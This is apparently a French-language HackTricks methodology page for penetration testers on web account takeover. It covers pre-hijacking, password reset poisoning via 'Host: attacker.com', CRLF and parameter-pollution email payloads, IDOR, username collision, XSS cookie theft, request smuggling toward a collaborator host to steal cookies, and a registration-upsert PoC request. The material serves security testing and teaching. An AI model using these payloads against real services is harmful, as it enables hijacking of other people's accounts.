def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Essayez la vérification en course : soumettez le même OTP valide simultanément dans deux sessions ; parfois une session devient un compte attaquant vérifié tandis que le flux de la victime réussit aussi.
- Testez aussi Host header poisoning sur les liens de vérification (même chose que reset poisoning ci‑dessous) pour leak ou compléter la vérification sur un hôte contrôlé par l'attaquant.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

Une classe puissante de problèmes survient lorsqu’un attaquant réalise des actions sur l’email de la victime avant que celle‑ci ne crée son compte, puis récupère l’accès plus tard.

Techniques clés à tester (adaptez-les aux flux de la cible) :

- Classic–Federated Merge
- Attacker : enregistre un compte classic avec l’email de la victime et définit un mot de passe
- Victim : s’inscrit ensuite via SSO (même email)
- Des merges non sécurisés peuvent laisser les deux parties connectées ou ressusciter l’accès de l’attaquant
- Unexpired Session Identifier
- Attacker : crée le compte et conserve une session longue durée (ne pas se déconnecter)
- Victim : récupère/définit le mot de passe et utilise le compte
- Testez si les anciennes sessions restent valides après un reset ou l’activation du MFA
- Trojan Identifier
- Attacker : ajoute un identifiant secondaire au compte pré‑créé (téléphone, email additionnel, ou lie l’IdP de l’attaquant)
- Victim : réinitialise le mot de passe ; l’attaquant utilise ensuite le trojan identifier pour reset/connexion
- Unexpired Email Change
- Attacker : initie un changement d’email vers l’email de l’attaquant et retient la confirmation
- Victim : récupère le compte et commence à l’utiliser
- Attacker : complète plus tard le changement d’email en attente pour voler le compte
- Non‑Verifying IdP
- Attacker : utilise un IdP qui ne vérifie pas la propriété de l’email pour affirmer `victim@…`
- Victim : s’inscrit via la méthode classic
- Le service fusionne sur la base de l’email sans vérifier `email_verified` ni effectuer une vérification locale

Conseils pratiques

- Récupérez les flux et endpoints depuis les bundles web/mobile. Cherchez classic signup, SSO linking, email/phone change et les endpoints de password reset.
- Créez une automation réaliste pour garder des sessions actives pendant que vous testez d’autres flux.
- Pour les tests SSO, déployez un IdP OIDC de test et émettez des tokens avec des claims `email` pour l’adresse de la victime et `email_verified=false` afin de vérifier si le RP fait confiance à des IdP non vérifiés.
- Après toute réinitialisation de mot de passe ou changement d’email, vérifiez que :
  - toutes les autres sessions et tokens sont invalidés,
  - les modifications d’email/téléphone en attente sont annulées,
  - les IdP/emails/téléphones précédemment liés sont revérifiés.

Note : Une méthodologie étendue et des études de cas de ces techniques sont documentées par la recherche de Microsoft sur le pre‑hijacking (voir Références à la fin).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Demandez un password reset vers votre adresse email
2. Cliquez sur le lien de password reset
3. Ne changez pas le mot de passe
4. Cliquez sur n’importe quel site tiers (ex : Facebook, twitter)
5. Interceptez la requête dans le proxy Burp Suite
6. Vérifiez si le referer header est en train de leak le token de password reset.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Interceptez la requête de password reset dans Burp Suite
2. Ajoutez ou éditez les headers suivants dans Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forwardez la requête avec le header modifié\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Cherchez une URL de password reset basée sur le _host header_ comme : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR sur les paramètres API

1. L’attaquant doit se connecter avec son compte et aller à la fonctionnalité Change password.
2. Démarrer Burp Suite et intercepter la requête\
3. Envoyez-la dans l’onglet repeater et modifiez les paramètres : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Token de réinitialisation de mot de passe faible

Le token de réinitialisation de mot de passe doit être généré aléatoirement et être unique à chaque fois.
Essayez de déterminer si le token expire ou s’il est toujours le même ; dans certains cas l’algorithme de génération est faible et peut être deviné. Les variables suivantes peuvent être utilisées par l’algorithme.

• Timestamp
• UserID
• Email of User
• Firstname and Lastname
• Date of Birth
• Cryptography
• Number only
• Small token sequence ( characters between [A-Z,a-z,0-9])
• Token reuse
• Token expiration date

Leaking Password Reset Token

1. Déclenchez une demande de réinitialisation de mot de passe via l’API/UI pour un email spécifique, p.ex.: test@mail.com
2. Inspectez la réponse du serveur et vérifiez la présence de resetToken
3. Utilisez ensuite le token dans une URL comme https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Réinitialisation de mot de passe via collision de nom d’utilisateur

1. Inscrivez-vous sur le système avec un nom d’utilisateur identique à celui de la victime, mais avec des espaces insérés avant et/ou après le nom. e.g: "admin "
2. Demandez une réinitialisation de mot de passe avec votre nom d’utilisateur malveillant.
3. Utilisez le token envoyé à votre email et réinitialisez le mot de passe de la victime.
4. Connectez-vous au compte de la victime avec le nouveau mot de passe.

La plateforme CTFd était vulnérable à cette attaque.
See: CVE-2020-7245

Détournement de compte via Cross Site Scripting

1. Trouvez un XSS dans l’application ou un sous-domaine si les cookies sont limités au domaine parent : *.domain.com
2. Leak le sessions cookie actuel
3. Authentifiez-vous en tant qu’utilisateur en utilisant le cookie

Détournement de compte via HTTP Request Smuggling

1. Utilisez smuggler pour détecter le type de HTTP Request Smuggling (CL, TE, CL.TE)
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. Fabriquez une requête qui écrasera le POST / HTTP/1.1 avec les données suivantes:
   GET http://something.burpcollaborator.net HTTP/1.1 X: dans le but de provoquer un open redirect des victimes vers burpcollab et voler leurs cookies\
3. La requête finale pourrait ressembler à la suivante

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone rapporte l’exploitation de ce bug\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Prise de contrôle de compte via CSRF

1. Créez un payload pour le CSRF, e.g: “HTML form with auto submit for a password change”
2. Envoyez le payload

Prise de contrôle de compte via JWT

JSON Web Token peut être utilisé pour authentifier un utilisateur.

• Modifiez le JWT avec un autre User ID / Email
• Vérifiez si la signature JWT est faible

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Some signup handlers perform an upsert when the provided email already exists. If the endpoint accepts a minimal body with an email and password and does not enforce ownership verification, sending the victim’s email will overwrite their password pre-auth.

• Découverte : récupérer les noms d’endpoint depuis le bundled JS (ou le trafic de l’app mobile), puis fuzz des base paths comme /parents/application/v4/admin/FUZZ en utilisant ffuf/dirsearch.
• Indications de méthode : un GET renvoyant des messages comme “Only POST request is allowed.” indique souvent le verbe correct et qu’un body JSON est attendu.
• Corps minimal observé sur le terrain :

{"email":"victim@example.com","password":"New@12345"}

Exemple de PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Impact : Full Account Takeover (ATO) without any reset token, OTP, or email verification.

Références

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

• Vérifiez les plans d’abonnement !
• Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
• Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.